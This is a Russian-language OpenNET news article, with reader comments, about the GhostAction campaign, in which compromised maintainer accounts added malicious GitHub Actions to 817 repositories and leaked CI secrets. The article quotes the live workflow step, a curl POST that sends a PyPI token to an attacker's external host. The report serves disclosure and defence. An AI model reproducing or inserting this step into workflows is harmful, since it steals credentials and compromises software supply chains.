The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

В ходе атаки GhostAction скомпрометировано 817 репозиториев на GitHub

06.09.2025 09:15

Исследователи из компании GitGuardian выявили массовую атаку на пользователей GitHub, в ходе которой был получен контроль над 327 учётными записями и осуществлена подстановка вредоносного обработчика Github Action в 817 репозиториев. Атака привела к утечке 3325 секретов, используемых в системах непрерывной интеграции и передаваемых через переменные окружения, включая токены доступа к PyPI, GitHub, NPM, DockerHub и различным облачным хранилищам.

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющем Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.


      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

  1. Главная ссылка к новости (https://blog.gitguardian.com/g...)
  2. OpenNews: Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
  3. OpenNews: Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториев
  4. OpenNews: Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
  5. OpenNews: GitHub обновил GPG-ключи из-за уязвимости, приводящей к утечке переменных окружения
  6. OpenNews: Атака на инфраструктуру PyTorch, компрометирующая репозиторий и релизы
Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/63831-github
Ключевые слова: github, action
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (32) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.4, Аноним (4), 10:18, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • –5 +/
    > GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub.

    Как новорится, ССЗБ. Нечего в проприетарном не селфхост облаке хранить критичные данные.

     
     
  • 2.7, Аноним (-), 10:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Дядя Петя, ты дундук? (с)

    >  Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

    Что мешает взломать твое не проприетарное селфхостед облако?
    Если ты им пользуешься сам, то может тебе хватит "Новая Папка (1)", "Новая Папка (2)" и тд?
    А если у тебя распределенная команда, то вероятность того что их взломают, не меньше гита.

     
     
  • 3.26, Аноним (26), 14:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >"Новая Папка (1)", "Новая Папка (2)" и тд

    А что, на self hosted запрещается использовать git daemon?

     
  • 3.31, КО (?), 15:30, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Отсутствие неподконтрольного тебе обработчика
     
  • 3.38, ffirefox (?), 16:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Если команда небольшая удобнее просто использовать Fossil вместо папок.
    GitHub всё больше в помойку превращается. Большинство реп никому не нужны кроме хозяина. А с приходом ИИ всё становится ещё печальней.
     
  • 2.22, Анон666 (?), 12:21, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Угу, отрвился хлебом - пеки сам
     

  • 1.6, Андрей (??), 10:25, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Никогда такого не было и вот опять ?
     
     
  • 2.8, Аноним (-), 10:33, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +4 +/
    Ага.
    Если учетку мейнтенера сломают, то могут сделать плохие вещи.
    Кто бы мог подумать?!!

    ИЧСХ у "типа конкурентов" гитхаба есть такие же экшены
    docs.gitlab.com/user/project/quick_actions/
    docs.gitea.com/usage/actions/comparison

     
     
  • 3.32, Аноним (32), 15:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Gitlab это скорее клон github
    Нормальную конкуренцию может составить radicle.xyz
     
     
  • 4.34, Аноним (-), 15:58, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Нормальную конкуренцию может составить radicle.xyz

    Это ты про п2п штуку для нетакусиков?
    Нормальные люди такой дичью не страдают.
    Ты бы еще даркнет предложил)


     

  • 1.9, Tron is Whistling (?), 10:33, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    Системы непрерывной интеграции троянов всё заинтегрировали нормально.
     
     
  • 2.11, Аноним (-), 10:38, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ваши предложения?
    Передевать код на дискетках как диды?
    Кричать "вася не трогай файл N я туда сейчас буду изменения заливать!"?
    Не делать автотесты перед мерджом?
     
     
  • 3.12, 27730 (?), 10:43, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да лучше на дискетах, сто процентов безопасно
     
     
  • 4.16, Аноним (16), 11:29, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Особенно, если она размагнитится по пути.
     
     
  • 5.18, Да ну нах (?), 11:42, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Два чая этому господину!
     
  • 5.30, Ананоним (?), 15:09, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Мои дискеты не размагнитились за 35 лет. Что у тебя там за путь или дискеты?
     
     
  • 6.35, Эксконтрибутор FreeBSD (?), 16:13, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Сказочник, блин
    Даже для того, что бы донести из дома до универа писали минимум на две дискеты, потому что одна вполне может размагнитится даже за время пути из дома в универ. А у тебя якобы за 35 лет нифига
    Ну, то есть я тебе верю. У тебя нет ни одной дискеты и потому ни одна не размагнитилась
     
     
  • 7.40, Ананоним (?), 17:07, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Твоя сказка про твои дискеты и путь выглядит для меня как "купил колонки в магазине за 100500 денех, пока нёс до дома, магниты в динамиках размагнитились". :D Если то не понимаешь что такое "размагнитились" или от чего реальное размагничивание происходит, то ты ССЗБ.
     
     
  • 8.41, Эксконтрибутор FreeBSD (?), 17:13, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Знаешь в чем твоя проблема У тебя не было дискет, ты в те времена еще не родилс... текст свёрнут, показать
     
  • 4.33, Аноним (32), 15:55, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Кстати был случай, у нас упал интернет и мы пушили на флешку (file:// протокол) и пулились оттуда :)
     
  • 3.14, localhostadmin (ok), 10:46, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Зачем до каменного века скатываться? Может достаточно просто не доверять свою чувствительную инфу сомнительным людям?
     
     
  • 4.15, Аноним (-), 10:51, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Сомнительные люди тут кто?
    Мейнтенеры, учетки которых взломали?
    Значит надо обходиться без мейнтенеров и писать все в одну персону.
    А чтобы твою учетку тоже не взломали, не доверять код интернету, и хранить его на подкроватном сервере.
     
     
  • 5.19, localhostadmin (ok), 11:52, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    >> Сомнительные люди тут кто?

    Ты хоть новость читал? Очевидно, что разрабы Github Actions Security

     
     
  • 6.20, Ангним (?), 12:02, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Разрабы GitHub actions security просто добавили отправку секретов на деревню дедушке. А вот сам этот экшен добавляли сломанные учётки мэинтейнеров.
     
  • 6.28, PROgrm_JARvis (ok), 14:44, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > разрабы Github Actions Security

    Нет никакого Github Actions Security, там злоумышленники тупо стадию пайплайна так назвали.

     
     
  • 7.29, Аноним (-), 14:49, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Но зачем в это углубляться?
    Увидели название гитхаб, вспомнили что ими владеют майкрософт...
    Всё этого достаточно чтобы полторы извилины уже отключились, во рту начала собираться пена и с праведным гневом пошли писать глупые комментарии.
     
  • 3.17, Tron is Whistling (?), 11:34, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Никаких предложений: говорю ж - нормально всё заинтегрировали, очень удобная штука.
     

  • 1.21, Аноним (21), 12:10, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Скажите, а мой репозиторий не скомпрометировали? Как проверить?
     
     
  • 2.25, Аноним (25), 14:25, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Написанному верить: Нет.
    06.09.25 Эксперт по всем вопросам. Имя Фамилия Отчество.
     
     
  • 3.27, Аноним (26), 14:36, 06/09/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     
     
  • 4.37, Аноним (25), 16:48, 06/09/2025 Скрыто ботом-модератором     [к модератору]
  • +/
     

  • 1.36, Anonymus (?), 16:43, 06/09/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    >Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

    А что, двухфакторная авторизация не помогла?

     
     
  • 2.39, Tron is Whistling (?), 17:00, 06/09/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В том виде, в котором она сейчас реализуется, двухфакторка - это лютый энной. Поэтому принужденные к этой фигне реально будут хранить оба фактора в одном менеджере паролей и вкопировать не глядя.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру